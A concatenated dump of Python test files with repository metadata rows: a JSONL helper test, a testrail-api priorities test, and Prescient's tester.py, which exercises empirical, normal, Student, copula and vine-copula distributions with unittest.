{"start": 9, "end": 10, "token_start": 5, "token_end": 6, "label": "e"},
],
}
]
expected = expected * 3
temp_file = os.path.join(tmpdir, "file.jsonl")
write_jsonl(expected, temp_file)
actual = read_jsonl(temp_file)
assert expected == actual
def test_split_list_by_linebreaks():
lst = ["a", "b", "c", None, "d"]
expected = [["a", "b", "c"], ["d"]]
actual = _split_list_by_linebreaks(lst)
def test_list_by_linebreaks_ending_in_None():
lst = ["a", "b", "c", float("nan"), "d", None]
expected = [["a", "b", "c"], ["d"]]
actual = _split_list_by_linebreaks(lst)
def test_list_by_linebreaks_starting_in_None():
lst = [None, "a", "b", "c", None, "d"]
expected = [["a", "b", "c"], ["d"]]
actual = _split_list_by_linebreaks(lst)
| 24.259475 | 88 | 0.414373 | 0 | 0 | 0 | 0 | 100 | 0.011953 | 0 | 0 | 3,232 | 0.386326 |
5fa141b264762a22f9a2b6309a86900f4d79fb07 | 389 | py | Python | tests/unit/test_priorities.py | anshumangoyal/testrail-api | a9b2983a59667999a8432fa0af034c1fbd07e1cc | [
"MIT"
] | 21 | 2019-04-15T07:25:48.000Z | 2022-03-19T04:21:43.000Z | tests/unit/test_priorities.py | anshumangoyal/testrail-api | a9b2983a59667999a8432fa0af034c1fbd07e1cc | [
"MIT"
] | 30 | 2019-04-15T07:18:59.000Z | 2022-03-19T07:26:57.000Z | tests/unit/test_priorities.py | anshumangoyal/testrail-api | a9b2983a59667999a8432fa0af034c1fbd07e1cc | [
"MIT"
] | 16 | 2019-02-21T11:59:32.000Z | 2022-02-23T17:33:16.000Z | import json
import responses
def test_get_priorities(api, mock, host):
mock.add_callback(
responses.GET,
'{}index.php?/api/v2/get_priorities'.format(host),
lambda x: (200, {}, json.dumps([{'id': 1, 'priority': 1}, {'id': 4, 'priority': 4}]))
)
resp = api.priorities.get_priorities()
assert resp[0]['id'] == 1
assert resp[1]['priority'] == 4
| 24.3125 | 93 | 0.59383 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 78 | 0.200514 |
5fa14c2eb69ff76b5ae4ab590ca445b49132d179 | 37,185 | py | Python | prescient/gosm/tester.py | iSoron/Prescient | a3c1d7c5840893ff43dca48c40dc90f083292d26 | [
"BSD-3-Clause"
] | 21 | 2020-06-03T13:54:22.000Z | 2022-02-27T18:20:35.000Z | prescient/gosm/tester.py | iSoron/Prescient | a3c1d7c5840893ff43dca48c40dc90f083292d26 | [
"BSD-3-Clause"
] | 79 | 2020-07-30T17:29:04.000Z | 2022-03-09T00:06:39.000Z | prescient/gosm/tester.py | bknueven/Prescient | 6289c06a5ea06c137cf1321603a15e0c96ddfb85 | [
"BSD-3-Clause"
] | 16 | 2020-07-14T17:05:56.000Z | 2022-02-17T17:51:13.000Z | # ___________________________________________________________________________
#
# Prescient
# Copyright 2020 National Technology & Engineering Solutions of Sandia, LLC
# (NTESS). Under the terms of Contract DE-NA0003525 with NTESS, the U.S.
# Government retains certain rights in this software.
# This software is distributed under the Revised BSD License.
# ___________________________________________________________________________
from timer import Timer,tic,toc
import unittest
from copula import GaussianCopula,FrankCopula,GumbelCopula,ClaytonCopula,StudentCopula, WeightedCombinedCopula
import numpy as np
import scipy
import scipy.integrate as spi
import scipy.special as sps
import scipy.stats as spst
from base_distribution import BaseDistribution,MultiDistr
from distributions import UnivariateEmpiricalDistribution, UnivariateEpiSplineDistribution
from distributions import UnivariateNormalDistribution,MultiNormalDistribution,UnivariateStudentDistribution, MultiStudentDistribution
from vine import CVineCopula,DVineCopula
import matplotlib.pyplot as plt
import copula_experiments
from copula_experiments.copula_diagonal import diag
from copula_experiments.copula_evaluate import RankHistogram,emd_sort,emd_pyomo
from distribution_factory import distribution_factory
class EmpiricalDistributionTester(unittest.TestCase):
def setUp(self):
points = [1, 1, 2, 2, 3, 5, 6, 8, 9]
self.distribution = UnivariateEmpiricalDistribution(points)
def test_at_point(self):
self.assertAlmostEqual(self.distribution.cdf(1), 2 / 10)
self.assertAlmostEqual(self.distribution.cdf_inverse(2 / 10), 1)
def test_before_first(self):
self.assertAlmostEqual(self.distribution.cdf(0.5), 1 / 10)
self.assertAlmostEqual(self.distribution.cdf_inverse(1 / 10), 0.5)
def test_far_before_first(self):
self.assertEqual(self.distribution.cdf(-4), 0)
def test_between_points(self):
self.assertAlmostEqual(self.distribution.cdf(4), 11 / 20)
self.assertAlmostEqual(self.distribution.cdf_inverse(11 / 20), 4)
def test_after_end(self):
self.assertAlmostEqual(self.distribution.cdf(9.5), 19 / 20)
self.assertAlmostEqual(self.distribution.cdf_inverse(19 / 20), 9.5)
def test_far_after_end(self):
self.assertAlmostEqual(self.distribution.cdf(20), 1)
class EpisplineTester(unittest.TestCase):
def setUp(self):
input_data = np.random.randn(1000)
self.distribution = UnivariateEpiSplineDistribution(input_data)
def test_cdf_values(self):
self.assertAlmostEqual(self.distribution.cdf(self.distribution.alpha), 0)
self.assertAlmostEqual(self.distribution.cdf(self.distribution.alpha - 100), 0)
self.assertAlmostEqual(self.distribution.cdf(self.distribution.beta), 1)
self.assertAlmostEqual(self.distribution.cdf(self.distribution.beta + 100), 1)
def test_region_probability(self):
# Tests the region probability by asserting the disjoint union of all regions must add up to 1
midpoint = (self.distribution.alpha + self.distribution.beta) / 2
integral_value = (self.distribution.region_probability((self.distribution.alpha, midpoint))
+ self.distribution.region_probability((midpoint, self.distribution.beta)))
self.assertAlmostEqual(integral_value, 1)
one_third_way = (2*self.distribution.alpha + self.distribution.beta) / 3
two_thirds_way = (self.distribution.alpha + 2*self.distribution.beta) / 3
integral_value = (self.distribution.region_probability((self.distribution.alpha, one_third_way))
+ self.distribution.region_probability((one_third_way, two_thirds_way))
+ self.distribution.region_probability((two_thirds_way, self.distribution.beta)))
self.assertAlmostEqual(integral_value, 1)
def test_quick(self):
print('Warning : this code must be called with runner.py')
# Copy this code at the beginning of copula_test to see if it works
# And enter python3 runner.py copula_experiments/run_test.txt
gosm_options.set_globals()
# Create output directory.
if not (os.path.isdir(gosm_options.output_directory)):
os.mkdir(gosm_options.output_directory)
X = np.arange(300)
tic()
mydistr = UnivariateEpiSplineDistribution(X)
for i in range(10):
print(mydistr.cdf(i))
toc()
class UnivariateNormalDistributionTester(unittest.TestCase):
def test_quick(self):
data = np.random.randn(1000)
dist = UnivariateNormalDistribution(input_data=data)
self.assertAlmostEqual(dist.rect_prob(-1.96,1.96),0.95,1)
def test_pdf_cdf(self):
x = -2 + 2 * np.random.randn(2000)
mydistr = UnivariateNormalDistribution(input_data=x)
res, i = spi.quad(mydistr.pdf, -1, 3)
self.assertAlmostEqual(res,mydistr.rect_prob(-1, 3),5)
def test_with_mean_var(self):
sigma = 2
mean = 3
data = sigma*np.random.randn(10000)+mean
dist = UnivariateNormalDistribution(input_data=data)
self.assertAlmostEqual(dist.cdf(4),0.6915,1)
dist = UnivariateNormalDistribution(mean = mean,var=sigma**2)
self.assertAlmostEqual(dist.cdf(4),0.6915,3)
class MultiNormalDistributionTester(unittest.TestCase):
def test_two_dimensions(self):
dimkeys = ["solar", "wind"]
dimension = len(dimkeys)
ourmean = [-4, 3]
ourcov = [[2, 0], [0, 2]]
lowerdict = {"solar": -1, "wind": 0}
upperdict = {"solar": 3, "wind": 4}
marginals = {"solar": UnivariateNormalDistribution(var=ourcov[0][0], mean=ourmean[0]),
"wind": UnivariateNormalDistribution(var=ourcov[1][1], mean=ourmean[1])}
data_array = np.random.multivariate_normal(ourmean, ourcov, 10000)
data_dict = dict.fromkeys(dimkeys)
for i in range(dimension):
data_dict[dimkeys[i]] = data_array[:, i]
dist = MultiNormalDistribution(dimkeys,input_data=data_dict)
dist2 = MultiNormalDistribution(dimkeys,mean=ourmean,cov=ourcov)
self.assertAlmostEqual(dist.rect_prob(lowerdict,upperdict),dist2.rect_prob(lowerdict,upperdict),2)
self.assertAlmostEqual(np.mean(dist.generates_X(n=1000)[:,1]),ourmean[1],1)
self.assertAlmostEqual(np.mean(dist.generates_X(n=1000)[:, 0]), ourmean[0], 1)
def test_with_gaussian_copula_1_dim(self):
mymean = 0
myvar = 2
dimkeys1 = ["solar"]
lowerdict = {"solar": -2}
upperdict = {"solar": 1}
data_array1 = np.random.multivariate_normal([mymean], [[myvar]], 10000)
data_dict1 = {"solar": data_array1[:, 0]}
marginals1 = {"solar": UnivariateNormalDistribution(input_data=data_array1[:, 0])}
unigaussian1 = GaussianCopula(input_data=data_dict1, dimkeys=dimkeys1, marginals=marginals1)
unigaussian2 = MultiNormalDistribution(dimkeys1, input_data=data_dict1)
self.assertAlmostEqual(unigaussian1.rect_prob(lowerdict, upperdict),unigaussian2.rect_prob(lowerdict, upperdict),3)
def test_with_gaussian_copula_2_dim(self):
dimkeys = ["solar", "wind"]
dimension = len(dimkeys)
ourmean = [3, 4]
ourmeandict = {"solar": 0, "wind": 0}
ourcov = [[1, 0.5], [0.5, 1]]
marginals = {"solar": UnivariateNormalDistribution(var=ourcov[0][0], mean=ourmean[0]),
"wind": UnivariateNormalDistribution(var=ourcov[1][1], mean=ourmean[1])}
valuedict = {"solar": 0, "wind": 0}
lowerdict = {"solar": 2, "wind": 3}
upperdict = {"solar": 4, "wind": 5}
data_array = np.random.multivariate_normal(ourmean, ourcov, 100000)
data_dict = dict.fromkeys(dimkeys)
for i in range(dimension):
data_dict[dimkeys[i]] = data_array[:, i]
multigaussian1 = GaussianCopula(input_data=data_dict, dimkeys=dimkeys, marginals=marginals, quadstep=0.001)
multigaussian2 = MultiNormalDistribution(dimkeys, input_data=data_dict)
valuedict = {"solar": 0.45, "wind": 0.89}
self.assertAlmostEqual(multigaussian1.rect_prob(lowerdict, upperdict),
multigaussian2.rect_prob(lowerdict, upperdict), 3)
def test_with_gaussian_copula_3_dim(self):
dimkeys = ["solar", "wind", "tide"]
dimension = len(dimkeys)
# dictin = {"solar": np.random.randn(200), "wind": np.random.randn(200)}
ourmean = [0, 0, 0]
ourcov = [[1, 0.1, 0.3], [0.1, 2, 0], [0.3, 0, 3]]
marginals = {"solar": UnivariateNormalDistribution(var=ourcov[0][0], mean=ourmean[0]),
"wind": UnivariateNormalDistribution(var=ourcov[1][1], mean=ourmean[1]),
"tide": UnivariateNormalDistribution(var=ourcov[2][2], mean=ourmean[2])}
valuedict = {"solar": 0, "wind": 0, "tide": 0}
lowerdict = {"solar": -1, "wind": -1, "tide": -1}
upperdict = {"solar": 1, "wind": 1, "tide": 1}
data_array = np.random.multivariate_normal(ourmean, ourcov, 1000)
data_dict = dict.fromkeys(dimkeys)
for i in range(dimension):
GaussianCopula(dimkeys, data_dict, marginals, pair_copulae_strings)
data_dict[dimkeys[i]] = data_array[:, i]
multigaussian1 = GaussianCopula(input_data=data_dict, dimkeys=dimkeys, marginals=marginals, quadstep=0.1)
multigaussian2 = MultiNormalDistribution(dimkeys, input_data=data_dict)
self.assertAlmostEqual(multigaussian1.rect_prob(lowerdict, upperdict),
multigaussian2.rect_prob(lowerdict, upperdict), 2)
self.assertAlmostEqual(multigaussian1.rect_prob(lowerdict, upperdict),multigaussian2.rect_prob(lowerdict, upperdict), 1)
class UnivariateStudentDistributionTester(unittest.TestCase):
def test_pdf_cdf(self):
x = -2 + 2 * np.random.randn(2000)
student = UnivariateStudentDistribution(input_data=x)
res, i = spi.quad(student.pdf, -1, 3)
self.assertAlmostEqual(res,student.rect_prob(-1, 3),5)
def test_in_student_copula_cdf(self):
dimkeys = ["solar", "wind"]
x = np.random.randn(2000)
dictin = {"solar": x, "wind": x + np.random.randn(2000)}
student = StudentCopula(dimkeys, dictin)
self.assertAlmostEqual(student._t(student._inverse_t(0.1)),0.1,7)
self.assertAlmostEqual(student._inverse_t(student._t(-6)),-6,7)
class MultiStudentDistributionTester(unittest.TestCase):
def test_generates_X(self):
x = np.random.randn(200)
dictin = {"solar": x, "wind": x + 0.5 * np.random.randn(200)}
dimkeys = ["solar", "wind"]
mydistr = MultiStudentDistribution(dictin)
print(mydistr.generates_X(10))
def initialize(dim=2,precision = None,copula_string='independence-copula'):
if dim==1:
mymean = 0
myvar = 2
dimkeys = ["solar"]
data_array = np.random.multivariate_normal([mymean], [[myvar]], 1000)
dictin = {"solar": data_array[:, 0]}
distr_class = distribution_factory(copula_string)
mydistr = distr_class(dimkeys, dictin)
return mydistr
if dim==2:
# For some tests, gaussian and student are less precised so we change so precision asked :
dimkeys = ["solar", "wind"]
ourmean = [3, 4]
rho=0.5
ourcov = [[1, rho], [rho, 1]]
data_array = np.random.multivariate_normal(ourmean, ourcov, 1000)
dictin = dict.fromkeys(dimkeys)
for i in range(dim):
dictin[dimkeys[i]] = data_array[:, i]
valuedict = {"solar": 0.14, "wind": 0.49}
distr_class = distribution_factory(copula_string)
mydistr = distr_class(dimkeys, dictin)
return mydistr
if dim==3:
dimkeys = ["solar", "wind", "tide"]
dimension = len(dimkeys)
# dictin = {"solar": np.random.randn(200), "wind": np.random.randn(200)}
ourmean = [0, 0, 0]
rho01 = 0.1
rho02 = 0.3
rho12 = 0
ourcov = [[1, rho01, rho02], [rho01, 2, rho12], [rho02, rho12, 3]]
marginals = {"solar": UnivariateNormalDistribution(var=ourcov[0][0], mean=ourmean[0]),
"wind": UnivariateNormalDistribution(var=ourcov[1][1], mean=ourmean[1]),
"tide": UnivariateNormalDistribution(var=ourcov[2][2], mean=ourmean[2])}
data_array = np.random.multivariate_normal(ourmean, ourcov, 1000)
dictin = dict.fromkeys(dimkeys)
for i in range(dimension):
dictin[dimkeys[i]] = data_array[:, i]
distr_class = distribution_factory(copula_string)
mydistr = distr_class(dimkeys, dictin)
return mydistr
class CopulaTester(unittest.TestCase):
def test_quick(self,copula_string='independence-copula'):
mydistr = initialize(copula_string=copula_string)
valuedict = {"solar": 0.05, "wind": 0.12}
valuedict = {"solar": 1, "wind": 0.34}
self.assertAlmostEqual(mydistr.C(valuedict),0.34,3)
valuedict = {"solar": 0.47, "wind": 1}
self.assertAlmostEqual(mydistr.C(valuedict), 0.47,3)
def test_C_with_sample(self,copula_string='independence-copula',dim=2):
if dim==2:
mydistr = initialize(copula_string=copula_string, dim=2)
valuedict = {"solar": 0.05, "wind": 0.12}
self.assertAlmostEqual(mydistr.C(valuedict),mydistr.C_from_sample(valuedict),2)
if dim==3:
if copula_string=='frank-copula'or copula_string=='clayton-copula' or copula_string=='gumbel-copula':
print('3d not implemented for archimedian copulas')
else:
mydistr = initialize(copula_string=copula_string, dim=3)
valuedict = {"solar": 0.12, "wind": 0.23, "tide": 0.31}
self.assertAlmostEqual(mydistr.C_from_sample(valuedict, 1000), mydistr.C(valuedict), 1)
def test_partial_derivative_C(self,copula_string='independence-copula'):
"""
In this test, we check if the partial derivative is correct by integrating it
and comparing the integral with the initial function.
"""
valuedict = {"solar": 0.67, "wind": 0.82}
mydistr= initialize(copula_string=copula_string)
if copula_string=='student-copula':
precision = 2
elif copula_string=='gaussian-copula':
precision = 4
else:
precision = 7
def g(x):
return mydistr.C_partial_derivative(u=valuedict.get("solar"),v=x)
res,i= spi.quad(g,0,valuedict.get("wind"))
self.assertAlmostEqual(mydistr.C(valuedict), res, precision)
valuedict = {"solar": 0.14, "wind": 0.42}
res, i = spi.quad(g, 0, valuedict.get("wind"))
self.assertAlmostEqual(mydistr.C(valuedict), res, precision)
def test_inverse_partial_C(self,copula_string='independence-copula'):
"""
In this test, we check if the partial derivative f inverse is correct by computing
f(inverse_f(x)) and inverse_f(f(x)) and checking if they are both equal to x.
"""
valuedict = {"solar": 0.84, "wind": 0.17}
mydistr = initialize(copula_string=copula_string)
u = valuedict.get("solar")
v = valuedict.get("wind")
direct = mydistr.C_partial_derivative(valuedict=valuedict)
inverse = mydistr.inverse_C_partial_derivative(valuedict=valuedict)
self.assertAlmostEqual(u,mydistr.C_partial_derivative(u=inverse,v=v),8)
self.assertAlmostEqual(u,mydistr.inverse_C_partial_derivative(u=direct,v=v),8)
def test_c_with_C_2_dim(self,copula_string='independence-copula'):
"""
In this test, we check if the partial derivative is correct by integrating it
and comparing the integral with the initial function.
"""
valuedict = {"solar": 0.34, "wind": 0.73}
mydistr = initialize(copula_string=copula_string)
def g(x,y):
return mydistr.c(u=x,v=y)
def low_bound(x):
return 0
def up_bound(x):
return valuedict.get("wind")
res,i= spi.dblquad(g,0,valuedict.get("solar"),low_bound,up_bound)
self.assertAlmostEqual(mydistr.C(valuedict),res,4)
valuedict = {"solar": 0.12, "wind": 0.21}
res, i = spi.dblquad(g,0,valuedict.get("solar"),low_bound,up_bound)
self.assertAlmostEqual(mydistr.C(valuedict), res,4)
def test_c_with_partial_C_2_dim(self,copula_string='independence-copula'):
"""
In this test, we check if the partial derivative is correct by integrating it
and comparing the integral with the initial function.
"""
mydistr = initialize(copula_string=copula_string)
valuedict = {"solar": 0.14, "wind": 0.49}
def g(x):
return mydistr.c(u=x,v=valuedict.get("wind"))
if copula_string=='student-copula':
precision = 2
else:
precision = 6
res,i= spi.quad(g,0,valuedict.get("solar"))
self.assertAlmostEqual(mydistr.C_partial_derivative(valuedict),res,precision)
valuedict = {"solar": 0.56, "wind": 0.37}
res, i = spi.quad(g, 0, valuedict.get("solar"))
self.assertAlmostEqual(mydistr.C_partial_derivative(valuedict), res,precision)
def test_plot(self,copula_string='independence-copula',dim=2):
if dim==2:
mydistr = initialize(copula_string=copula_string,dim=dim)
n = 30 #number of points you want to display
U = mydistr.generates_U(n=n)
diag2 = diag(2)
for k in range(2): # index of the diagonal where you want to project we do both
plt.plot(U[:, 0], U[:, 1], 'go')
plt.plot([diag2.list_of_diag[k][0][1], diag2.list_of_diag[k][1][1]], 'b')
P = diag2.proj_vector(U,k)
plt.plot(P[:, 0], P[:, 1], 'ro')
plt.plot([U[:, 0], P[:, 0]], [U[:, 1], P[:, 1]], c='k')
plt.show()
if dim==3:
if copula_string=='frank-copula'or copula_string=='clayton-copula' or copula_string=='gumbel-copula':
print('Plot 3d not implemented for archimedian copulas')
else:
mydistr = initialize(dim=3,copula_string=copula_string)
n = 20 # number of points to display
U = mydistr.generates_U(n=n)
d = 3
diago = diag(d)
P = []
fig = plt.figure()
center = 0.5 * np.ones(d)
k = 2 # index of the diagonal where you want to project
ax = fig.add_subplot(111, projection='3d')
ax.scatter(U[:, 0], U[:, 1], U[:, 2], c='g', marker='o')
for i in range(n):
P = diago.proj_vector(U[i], k)
ax.scatter(P[0, 0], P[0, 1], P[0, 2], c='r', marker='o')
ax.plot([U[i, 0], P[0, 0]], [U[i, 1], P[0, 1]], [U[i, 2], P[0, 2]], c='k')
diagonal = diago.list_of_diag[k]
ax.plot([diagonal[0][0], diagonal[1][0]], [diagonal[0][1], diagonal[1][1]],
[diagonal[0][2], diagonal[1][2]],
c='b')
ax.set_xlabel(mydistr.dimkeys[0])
ax.set_ylabel(mydistr.dimkeys[1])
ax.set_zlabel(mydistr.dimkeys[2])
plt.show()
class LogLikelihoodTester(unittest.TestCase):
def test_gaussian_copula2d(self):
n = 10000
dimkeys = ["solar", "wind"]
dimension = len(dimkeys)
ourmean = [2, 3]
ourmeandict = {"solar": 0, "wind": 0}
rho = 0.5
rho2 = 0.7
ourcov = [[1, rho], [rho, 1]]
ourcov2 = [[1, rho2], [rho2, 1]]
marginals = {"solar": UnivariateNormalDistribution(var=ourcov[0][0], mean=ourmean[0]),
"wind": UnivariateNormalDistribution(var=ourcov[1][1], mean=ourmean[1])}
data_array = np.random.multivariate_normal(ourmean, ourcov, 100000)
data_array2 = np.random.multivariate_normal(ourmean, ourcov2, 100000)
data_dict = dict.fromkeys(dimkeys)
for i in range(dimension):
data_dict[dimkeys[i]] = data_array[:, i]
data_dict2 = dict.fromkeys(dimkeys)
for i in range(dimension):
data_dict2[dimkeys[i]] = data_array2[:, i]
gumbel = GumbelCopula(dimkeys, data_dict, marginals)
frank = FrankCopula(dimkeys, data_dict, marginals)
clayton = ClaytonCopula(dimkeys, data_dict, marginals)
student = StudentCopula(dimkeys, data_dict, marginals)
multigaussian1 = GaussianCopula(dimkeys=dimkeys, input_data=data_dict, marginals=marginals, quadstep=0.001)
multigaussian2 = GaussianCopula(dimkeys=dimkeys, input_data=data_dict, marginals=marginals, quadstep=0.001,
cov=ourcov2)
multigaussian3 = GaussianCopula(dimkeys=dimkeys, input_data=data_dict2, marginals=marginals, quadstep=0.001,
cov=ourcov2)
multigaussian4 = GaussianCopula(dimkeys=dimkeys, input_data=data_dict2, marginals=marginals, quadstep=0.001,
cov=ourcov)
l1=multigaussian1.c_log_likelihood()
self.assertGreater(l1,multigaussian2.c_log_likelihood())
self.assertGreater(multigaussian3.c_log_likelihood(),multigaussian4.c_log_likelihood())
self.assertGreater(l1,gumbel.c_log_likelihood())
self.assertGreater(l1, clayton.c_log_likelihood())
self.assertGreater(l1, frank.c_log_likelihood())
self.assertGreater(l1, student.c_log_likelihood())
def test_weighted_combined_copula3d(self):
dimkeys = ["solar", "wind", "tide"]
dimension = len(dimkeys)
ourmean = [0, 0, 0]
ourcov = [[1, 0.1, 0.3], [0.1, 2, 0], [0.3, 0, 3]]
marginals = {"solar": UnivariateNormalDistribution(var=ourcov[0][0], mean=ourmean[0]),
"wind": UnivariateNormalDistribution(var=ourcov[1][1], mean=ourmean[1]),
"tide": UnivariateNormalDistribution(var=ourcov[2][2], mean=ourmean[2])}
data_array = np.random.multivariate_normal(ourmean, ourcov, 10000)
data_dict = dict.fromkeys(dimkeys)
for i in range(dimension):
data_dict[dimkeys[i]] = data_array[:, i]
copulas= ['student-copula', 'gaussian-copula']
list_of_gaussian = ['gaussian-copula','gaussian-copula']
list_of_student = ['student-copula','student-copula']
weights =[0.12,0.88]
mydistr = WeightedCombinedCopula(dimkeys,data_dict,marginals,copulas,weights)
gaussian = GaussianCopula(dimkeys,data_dict,marginals)
weightedgaussian = WeightedCombinedCopula(dimkeys,data_dict,marginals,list_of_gaussian,weights)
weightedstudent = WeightedCombinedCopula(dimkeys, data_dict, marginals, list_of_student, weights)
student = StudentCopula(dimkeys,data_dict,marginals)
g = gaussian.c_log_likelihood()
s = student.c_log_likelihood()
m = mydistr.c_log_likelihood()
self.assertAlmostEqual(weightedgaussian.c_log_likelihood(),g,7)
self.assertAlmostEqual(weightedstudent.c_log_likelihood(),s,7)
self.assertGreater(g,m)
self.assertGreater(m,s)
class VineCopulaTester(unittest.TestCase):
def test_quick_dim_2(self):
dimkeys = ["solar", "wind"]
dimension = len(dimkeys)
ourmean = [1, 0.5]
ourcov = [[1, 0.3], [0.3, 2]]
marginals = {"solar": UnivariateNormalDistribution(var=ourcov[0][0], mean=ourmean[0]),
"wind": UnivariateNormalDistribution(var=ourcov[1][1], mean=ourmean[1])}
data_array = np.random.multivariate_normal(ourmean, ourcov, 10000)
data_dict = dict.fromkeys(dimkeys)
for i in range(dimension):
data_dict[dimkeys[i]] = data_array[:, i]
pair_copulae_strings = [[None, 'student-copula'],
[None, None]]
valuedict = {"solar": 0.96, "wind": 0.87}
CVine = CVineCopula(dimkeys, data_dict, marginals, pair_copulae_strings)
DVine = DVineCopula(dimkeys, data_dict, marginals, pair_copulae_strings)
gaussiancopula = GaussianCopula(dimkeys,data_dict,marginals)
gaussiancopula.c(valuedict)
self.assertAlmostEqual(CVine.C(valuedict),DVine.C(valuedict),1)
self.assertAlmostEqual(gaussiancopula.C(valuedict), DVine.C(valuedict), 1)
self.assertAlmostEqual(CVine.C(valuedict), gaussiancopula.C(valuedict), 1)
def test_quick_dim_3(self):
dimkeys = ["solar", "wind", "tide"]
dimension = len(dimkeys)
ourmean = [0, 0, 0]
ourcov = [[1, 0.1, 0.3], [0.1, 2, 0], [0.3, 0, 3]]
marginals = {"solar": UnivariateNormalDistribution(var=ourcov[0][0], mean=ourmean[0]),
"wind": UnivariateNormalDistribution(var=ourcov[1][1], mean=ourmean[1]),
"tide": UnivariateNormalDistribution(var=ourcov[2][2], mean=ourmean[2])}
data_array = np.random.multivariate_normal(ourmean, ourcov, 10000)
data_dict = dict.fromkeys(dimkeys)
for i in range(dimension):
data_dict[dimkeys[i]] = data_array[:, i]
pair_copulae_strings = [[None, 'student-copula', 'frank-copula'],
[None, None, 'clayton-copula'],
[None, None, None]]
valuedict = {"solar": 0.43, "wind": 0.92, "tide": 0.27}
print('CVine')
CVine = CVineCopula(dimkeys, data_dict, marginals, pair_copulae_strings)
print(CVine.C(valuedict=valuedict))
print(CVine.c(valuedict))
print('DVine')
DVine = DVineCopula(dimkeys, data_dict, marginals, pair_copulae_strings)
print(DVine.C(valuedict=valuedict))
print(DVine.c(valuedict))
def test_with_multinormal_3_dim(self):
dimkeys = ["solar", "wind", "tide"]
dimension = len(dimkeys)
ourmean = [0, 0, 0]
ourcov = [[1, 0.1, 0.3], [0.1, 2, 0], [0.3, 0, 3]]
marginals = {"solar": UnivariateNormalDistribution(var=ourcov[0][0], mean=ourmean[0]),
"wind": UnivariateNormalDistribution(var=ourcov[1][1], mean=ourmean[1]),
"tide": UnivariateNormalDistribution(var=ourcov[2][2], mean=ourmean[2])}
valuedict = {"solar": 0, "wind": 0, "tide": 0}
lowerdict = {"solar": -3, "wind": -2.3, "tide": -0.9}
upperdict = {"solar": 1, "wind": 1.4, "tide": 2.7}
data_array = np.random.multivariate_normal(ourmean, ourcov, 10000)
data_dict = dict.fromkeys(dimkeys)
for i in range(dimension):
data_dict[dimkeys[i]] = data_array[:, i]
pair_copulae_strings = [[None, 'gaussian-copula', 'gaussian-copula'],
[None, None, 'gaussian-copula'],
[None, None, None]]
with Timer('MultiNormal'):
multigaussian = MultiNormalDistribution(dimkeys, input_data=data_dict)
print(multigaussian.rect_prob(lowerdict, upperdict))
cvine = CVineCopula(dimkeys, data_dict, marginals, pair_copulae_strings)
with Timer('CVine rect_prob calculus'):
print(cvine.rect_prob(lowerdict, upperdict))
dvine = DVineCopula(dimkeys, data_dict, marginals, pair_copulae_strings)
with Timer('DVine rect_prob calculus'):
print(dvine.rect_prob(lowerdict, upperdict))
def test_with_multinormal_4_dim(self):
dimkeys = ["solar", "wind", "tide","geo"]
dimension = len(dimkeys)
ourmean = [0, 0, 0, 0]
ourcov = [[1, 0.1, 0.3,0.4], [0.1, 2, 0,0], [0.3, 0, 3,0],[0.4,0,0,4]]
marginals = {"solar": UnivariateNormalDistribution(var=ourcov[0][0], mean=ourmean[0]),
"wind": UnivariateNormalDistribution(var=ourcov[1][1], mean=ourmean[1]),
"tide": UnivariateNormalDistribution(var=ourcov[2][2], mean=ourmean[2]),
"geo":UnivariateNormalDistribution(var=ourcov[3][3], mean=ourmean[3])}
valuedict = {"solar": 0, "wind": 0, "tide": 0,"geo":0}
lowerdict = {"solar": -1, "wind": -1, "tide": -1,"geo":-2}
upperdict = {"solar": 1, "wind": 1, "tide": 1,"geo":2}
data_array = np.random.multivariate_normal(ourmean, ourcov, 10000)
data_dict = dict.fromkeys(dimkeys)
for i in range(dimension):
data_dict[dimkeys[i]] = data_array[:, i]
pair_copulae_strings = [[None, 'gaussian-copula', 'gaussian-copula','gaussian-copula'],
[None, None, 'gaussian-copula','gaussian-copula'],
[None, None, None,'gaussian-copula'],
[None,None,None,None]]
with Timer('MultiNormal'):
multigaussian = MultiNormalDistribution(dimkeys, input_data=data_dict)
print(multigaussian.rect_prob(lowerdict, upperdict))
cvine = CVineCopula(dimkeys, data_dict, marginals, pair_copulae_strings)
with Timer('CVine rect_prob calculus'):
print(cvine.rect_prob(lowerdict, upperdict))
dvine = DVineCopula(dimkeys, data_dict, marginals, pair_copulae_strings)
with Timer('DVine rect_prob calculus'):
print(dvine.rect_prob(lowerdict, upperdict))
def test_plot(self):
dimkeys = ["solar", "wind", "tide"]
dimension = len(dimkeys)
ourmean = [0, 0, 0]
ourcov = [[1, 1.3, 1.2], [1.3, 2, 0], [1.2, 0, 1.5]]
marginals = {"solar": UnivariateNormalDistribution(var=ourcov[0][0], mean=ourmean[0]),
"wind": UnivariateNormalDistribution(var=ourcov[1][1], mean=ourmean[1]),
"tide": UnivariateNormalDistribution(var=ourcov[2][2], mean=ourmean[2])}
data_array = np.random.multivariate_normal(ourmean, ourcov, 10000)
data_dict = dict.fromkeys(dimkeys)
for i in range(dimension):
data_dict[dimkeys[i]] = data_array[:, i]
pair_copulae_strings = [[None, 'gaussian-copula', 'frank-copula'],
[None, None, 'gaussian-copula'],
[None, None, None]]
valuedict = {"solar": 1, "wind": 1, "tide": 0.73}
lowerdict = {"solar": -3, "wind": -2, "tide": 0}
upperdict = {"solar": 0.5, "wind": 1, "tide": 1}
mydistr = DVineCopula(dimkeys, data_dict, marginals, pair_copulae_strings)
n = 20 #number of points to display
U = mydistr.generates_U(n=n)
d = 3
diago = diag(d)
P =[]
fig = plt.figure()
center = 0.5*np.ones(d)
k = 2 #index of the diagonal where you want to project
ax = fig.add_subplot(111, projection='3d')
ax.scatter(U[:, 0], U[:, 1], U[:, 2], c='g', marker='o')
for i in range(n):
P = diago.proj(U[i],k)
ax.scatter(P[0,0],P[0,1],P[0,2], c='r', marker='o')
ax.plot([U[i,0], P[0,0]],[U[i,1], P[0,1]],[U[i,2], P[0,2]], c='k')
diagonal = diago.list_of_diag[k]
ax.plot([diagonal[0][0],diagonal[1][0]], [diagonal[0][1],diagonal[1][1]],[diagonal[0][2],diagonal[1][2]], c='b')
ax.set_xlabel(dimkeys[0])
ax.set_ylabel(dimkeys[1])
ax.set_zlabel(dimkeys[2])
plt.show()
class RankHistogramTester(unittest.TestCase):
def test_normal_distribution(self):
mu = 0
sigma = 1
m = 10000
mydistr = UnivariateNormalDistribution(0, 1)
rank_data = mu + sigma * np.random.randn(10000)
rank = RankHistogram(mydistr, rank_data, 25)
rank.plot()
def test_gaussian_copula(self):
n = 10000
dimkeys = ["solar", "wind"]
dimension = len(dimkeys)
ourmean = [2, 3]
ourmeandict = {"solar": 0, "wind": 0}
rho =0.5
rho2 = 0.5
